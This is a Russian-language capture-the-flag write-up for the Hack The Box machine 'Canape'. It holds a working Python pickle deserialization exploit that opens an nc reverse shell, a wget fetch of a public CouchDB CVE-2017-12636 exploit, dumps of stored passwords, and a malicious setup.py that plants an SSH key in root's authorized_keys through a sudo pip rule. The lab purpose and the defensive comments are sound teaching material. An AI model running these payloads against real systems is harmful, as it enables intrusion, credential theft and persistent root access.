Обзор сервисов
$ sudo nmap -sC -sV -sT -Pn -p- -v -oN nmap 10.10.10.70
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 3FED5FB44C411733402A1C8C01E49994
| http-git:
| 10.10.10.70:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Last commit message: final # Please enter the commit message for your changes. Li...
| Remotes:
|_ http://git.canape.htb/simpsons.git
| http-methods:
|_ Supported Methods: HEAD OPTIONS GET
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Simpsons Fan Site
|_http-trane-info: Problem with XML parsing of /evox/about
65535/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8d:82:0b:31:90:e4:c8:85:b2:53:8b:a1:7c:3b:65:e1 (RSA)
| 256 22:fc:6e:c3:55:00:85:0f:24:bf:f5:79:6c:92:8b:68 (ECDSA)
|_ 256 0d:91:27:51:80:5e:2b:a3:81:0d:e9:d8:5c:9b:77:35 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
http://10.10.10.70/.git/config
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = http://git.canape.htb/simpsons.git
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
remote = origin
merge = refs/heads/master
Добавим `10.10.10.70 git.canape.htb canape.htb` в /etc/hosts.
Git
$ git clone http://git.canape.htb/simpsons.git
$ cd simpsons
$ cat __init__.py
...
db = couchdb.Server("http://localhost:5984/")[app.config["DATABASE"]]
Exploit
Кастомный cPickle-эксплоит (exploit.py):
import requests
import hashlib
import cPickle
import os
class Test(object):
    """Pickle gadget object.

    __reduce__ is what the unpickler consults to rebuild an object, and
    it may return an arbitrary callable plus arguments -- here os.system
    and a shell command. Whatever process later deserializes this object
    therefore executes the command. This is the textbook reason pickle
    (cPickle here; the script is Python 2) must never be applied to data a
    client controls; a plain data format such as JSON plus input
    validation does not have this property.
    """

    def __reduce__(self) -> tuple:
        # The leading "homer!" is deliberate: the '!' is the split point
        # used further down to carve the serialized stream into the two
        # form fields.  The remainder is the reverse-shell command that
        # connects back to the `nc -lnvp 1234` listener shown below.
        return (os.system,("homer!;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 1234 >/tmp/f",))
# Serialize the gadget and split the pickle bytes at the single '!'
# embedded in the command (tuple unpacking implies exactly one '!' is
# present): the part before it becomes "character", the rest "quote".
character, quote = cPickle.dumps(Test()).split("!")
# Record id the app is assumed to derive as md5(character + quote) --
# verify against the cloned __init__.py before relying on this.
p_id = hashlib.md5(character + quote).hexdigest()
# Store the record, then hit the check endpoint, which presumably
# unpickles the stored fields server-side; that is the point where
# os.system runs.  A defender would look for pickle.loads/cPickle.loads
# on request- or database-sourced data in the application code.
requests.post("http://10.10.10.70/submit", data={"character": character, "quote": quote})
requests.post("http://10.10.10.70/check", data={"id": p_id})
nc -lnvp 1234
python exp.py
CouchDB
CouchDB запущен от имени пользователя homer:
Публичный эксплоит
wget https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/exp.py
Загрузим его в /tmp/exp.py и изменим IP-адрес. Запускаем:
python3 exp.py
wooyun:wooyun
— этот пользователь будет иметь права администратора в CouchDB после выполнения скрипта.
www-data@canape:/tmp$ curl 127.0.0.1:5984/passwords/_all_docs --user 'wooyun:wooyun'
{"total_rows":4,"offset":0,"rows":[
{"id":"739c5ebdf3f7a001bebb8fc4380019e4","key":"739c5ebdf3f7a001bebb8fc4380019e4","value":{"rev":"2-81cf17b971d9229c54be92eeee723296"}},
{"id":"739c5ebdf3f7a001bebb8fc43800368d","key":"739c5ebdf3f7a001bebb8fc43800368d","value":{"rev":"2-43f8db6aa3b51643c9a0e21cacd92c6e"}},
{"id":"739c5ebdf3f7a001bebb8fc438003e5f","key":"739c5ebdf3f7a001bebb8fc438003e5f","value":{"rev":"1-77cd0af093b96943ecb42c2e5358fe61"}},
{"id":"739c5ebdf3f7a001bebb8fc438004738","key":"739c5ebdf3f7a001bebb8fc438004738","value":{"rev":"1-49a20010e64044ee7571b8c1b902cf8c"}}
]}
www-data@canape:/tmp$ curl 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc4380019e4 --user 'wooyun:wooyun'
{"_id":"739c5ebdf3f7a001bebb8fc4380019e4","_rev":"2-81cf17b971d9229c54be92eeee723296","item":"ssh","password":"0B4jyA0xtytZi7esBNGp","user":""}
www-data@canape:/tmp$ curl 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc43800368d --user 'wooyun:wooyun'
{"_id":"739c5ebdf3f7a001bebb8fc43800368d","_rev":"2-43f8db6aa3b51643c9a0e21cacd92c6e","item":"couchdb","password":"r3lax0Nth3C0UCH","user":"couchy"}
www-data@canape:/tmp$ curl 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc438003e5f --user 'wooyun:wooyun'
{"_id":"739c5ebdf3f7a001bebb8fc438003e5f","_rev":"1-77cd0af093b96943ecb42c2e5358fe61","item":"simpsonsfanclub.com","password":"h02ddjdj2k2k2","user":"homer"}
www-data@canape:/tmp$ curl 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc438004738 --user 'wooyun:wooyun'
{"_id":"739c5ebdf3f7a001bebb8fc438004738","_rev":"1-49a20010e64044ee7571b8c1b902cf8c","user":"homerj0121","item":"github","password":"STOP STORING YOUR PASSWORDS HERE -Admin"}
Флаг пользователя
$ ssh [email protected] -p 65535
0B4jyA0xtytZi7esBNGp
homer@canape:~$ cat user.txt
bce918696f293e62b2321703bb27288d
Повышение привилегий
homer@canape:~$ sudo -l
[sudo] password for homer:
Matching Defaults entries for homer on canape:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User homer may run the following commands on canape:
(root) /usr/bin/pip install *
mkdir /tmp/t
cd /tmp/t
nano setup.py
from setuptools import setup
from setuptools.command.install import install
import base64
import os
class CustomInstall(install):
    """Override of setuptools' install command.

    pip executes setup.py of the package being installed, so any
    cmdclass hook runs with the privileges of the pip process.  The
    sudoers rule above lets homer run `/usr/bin/pip install *` as root,
    which means this run() executes as root: a wildcard sudo rule on pip
    is equivalent to granting a root shell.  Mitigation is to never
    allow sudo on pip with user-controlled arguments.
    """

    def run(self) -> None:
        # Perform the normal install first so pip sees a regular package.
        install.run(self)
        # The variable name is misleading: no reverse connection is
        # opened.  The snippet appends an SSH public key (redacted in this
        # listing) to /root/.ssh/authorized_keys -- a persistence artefact
        # worth auditing on any host where such a sudo rule existed.
        reverse_shell = 'mkdir /root/.ssh;echo ssh-rsa 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 kali@kalihackthebox >> /root/.ssh/authorized_keys'
        # Python 2 semantics: b64encode accepts a str here.  The base64
        # round-trip only sidesteps shell quoting of the snippet; it does
        # not change what is executed.
        encoded = base64.b64encode(reverse_shell)
        os.system('echo %s|base64 -d|bash' % encoded)
# Package metadata is cosmetic; the only field that matters is cmdclass,
# which substitutes CustomInstall for the standard install command so
# that `pip install .` invokes CustomInstall.run.
setup(name='FakePip',
      version='0.0.1',
      description='This will exploit a sudoer able to /usr/bin/pip install *',
      url='https://github.com/0x00-0x00/fakepip',
      author='zc00l',
      author_email='[email protected]',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})
sudo -H /usr/bin/pip install . --upgrade --force-reinstall
Флаг суперпользователя
$ ssh [email protected] -p 65535
root@canape:~# ls
root.txt
root@canape:~# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:b9:80:86 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.70/24 brd 10.10.10.255 scope global ens33
valid_lft forever preferred_lft forever
root@canape:~# id
uid=0(root) gid=0(root) groups=0(root)
root@canape:~# cat root.txt
928c3df1a12d7f67d2e8c2937120976d